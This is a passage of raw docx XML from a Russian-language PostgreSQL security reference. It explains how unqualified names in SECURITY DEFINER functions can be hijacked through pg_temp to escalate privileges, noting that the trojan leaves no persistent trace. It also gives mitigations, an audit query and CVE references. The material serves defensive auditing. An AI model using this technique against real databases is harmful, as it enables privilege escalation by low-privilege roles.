    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Дополнительный эффект: trojan в </w:t>
      </w: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исчезает при DISCONNECT сессии — нет persistent artifact в БД. Forensic-анализ потребует полные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pg_audit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> логи с захватом тел DDL.</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PostgreSQL resolve unqualified-имён (функций, операторов, типов) идёт по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">search_path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">в момент исполнения</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не в момент CREATE FUNCTION.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меняет current_user, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не меняет search_path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — он остаётся от вызывающего. Это намеренное поведение: search_path считается user preference, привязанной к сессии, а не к функции.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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всегда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">первая</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в эффективном search_path, если не указана явно — это hardcoded поведение PostgreSQL (можно отключить только через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET search_path = pg_catalog, ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> без pg_temp). Каждая сессия имеет свой pg_temp, и любая роль имеет CREATE на свой pg_temp (это design: temp-tables, temp-functions для удобства).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сочетание этих двух фактов — SECURITY DEFINER не меняет search_path + pg_temp всегда первая + любая роль может CREATE в pg_temp — даёт universal hijack для unqualified-имён внутри SECURITY DEFINER функций.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Защита (документированная PostgreSQL Project с конца 2010-х):</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app.audit_action(user_name text, action text)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RETURNS void LANGUAGE plpgsql SECURITY DEFINER</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET search_path = pg_catalog, pg_temp   -- ← ОБЯЗАТЕЛЬНО</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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INSERT INTO audit_log(user, action, ts)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  VALUES (lower(user_name), action, now());</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SET search_path = pg_catalog, pg_temp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в declaration функции — search_path внутри тела жёстко зафиксирован, начинается с pg_catalog (никакие user-функции не могут перебить системные). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_temp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> добавляется в конец (если функция нуждается в temp-таблицах), но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">после</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pg_catalog — что обнуляет hijack-вектор.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Альтернатива — полная квалификация всех имён в теле функции:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">INSERT INTO public.audit_log(user, action, ts)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VALUES (pg_catalog.lower(user_name), action, pg_catalog.now());</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второй слой защиты</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> независимый от SET search_path. Применяется в особо чувствительных функциях.</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(поведение задокументировано с PostgreSQL 8.x, не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Любая роль с access к БД (pg_temp всегда доступен)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EXECUTE на SECURITY DEFINER функцию (обычно выдано PUBLIC, иначе функция бесполезна)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Superuser не требуется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жертвы:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> owner SECURITY DEFINER функции, типично superuser или application-admin.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Расширения:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> нет требований.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GUC:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> дефолтный search_path (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"$user", public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Если admin поставил </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">search_path = pg_catalog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, hijack не сработает (но это редкая конфигурация).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существует SECURITY DEFINER функция без явного </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET search_path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в declaration.</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SECURITY DEFINER — стандартный механизм для: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audit-trail wrappers (как в примере выше — функция логирует действие в защищённую таблицу)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permission-check functions (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">check_can_access(user, resource) → bool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encapsulated DML-операции (atomically modify несколько таблиц с проверкой инвариантов)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CREATE EXTENSION-функции, использующие internal схемы</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-вывод с regex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 последующий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET search_path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> отсутствует в declaration. Все SECURITY DEFINER функции без SET search_path — критичны.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`pg_proc`-запрос для аудита</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SELECT n.nspname, p.proname FROM pg_proc p</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    WHERE p.prosecdef = true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      AND NOT EXISTS (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        SELECT 1 FROM unnest(p.proconfig) c WHERE c LIKE 'search_path=%'</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Runtime detection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function_call</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для функций, owned superuser-ом, с CHECK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">current_schemas(false)[1] = 'pg_temp'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — alert если pg_temp активно первая.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`pg_proc.prosrc` для функций в pg_temp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: статический сканер на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER 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GRANT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Если в pg_temp у любой роли есть функция с такими операциями — она готовый payload.</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Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Все версии PG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; не CVE, класс mis-configuration. Поведение SECURITY DEFINER + search_path задокументировано с PostgreSQL 8.x (2005). Recommendation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET search_path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> присутствует в PostgreSQL Docs с тех же лет.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В PostgreSQL 15 (релиз 13.10.2022) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">REVOKE CREATE ON SCHEMA public FROM PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для новых кластеров — частично снижает поверхность атаки для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">некоторых</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> hijack-сценариев (где hijack идёт через public, не pg_temp), но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_temp по-прежнему открыт для всех</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, поэтому 3.13.6-pattern остаётся актуальным даже в PG 15+.</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3.13.2 search_path hijacking + schema_element (CVE-2023-2454)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — связанный класс уязвимостей по неполной квалификации в DDL. Граница: 3.13.2 — баг в CREATE SCHEMA; 3.13.6 — mis-configuration в CREATE FUNCTION.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 Extension scripts (CVE-2022-2625)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — другой trojan-vector в admin-DDL. Связаны общей моделью угроз (4-я схема в обзоре 3.13.0: trap-объект).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 SET ROLE (CVE-2024-10978)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — связан тем, что SECURITY DEFINER + SET search_path issues могут стать каналом для CVE-2024-10978 (плохая комбинация SECURITY DEFINER + некорректный reset).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связанная категория: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">format('%I', ...)</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format('%s', ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Граница: 3.16 — невалидная квалификация identifiers; 3.13.6 — отсутствие квалификации в SECURITY DEFINER context.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 3.7.2a / 3.7.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — финальные RCE-векторы.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(Mitigations)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — рекомендации по аудиту SECURITY DEFINER функций в кодовой базе.</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«SECURITY DEFINER» в CREATE FUNCTION — https://www.postgresql.org/docs/current/sql-createfunction.html#SQL-CREATEFUNCTION-SECURITY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«Writing SECURITY DEFINER Functions Safely» — https://www.postgresql.org/docs/current/sql-createfunction.html (раздел Writing SECURITY DEFINER Functions Safely)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«Schema Search Path» — https://www.postgresql.org/docs/current/ddl-schemas.html#DDL-SCHEMAS-PATH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Wiki: «Schema search_path attacks» — https://wiki.postgresql.org/wiki/A_Guide_to_CVE-2018-1058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Wiki: «Reasoning about security» — https://wiki.postgresql.org/wiki/Security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CVE-2018-1058 (исторический контекст — search_path hijacking от postgres-роли) — https://www.postgresql.org/about/news/cve-2018-1058-protect-your-search-path-1834/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Саммари категории 3.13</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В категории 3.13 разобраны шесть путей </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
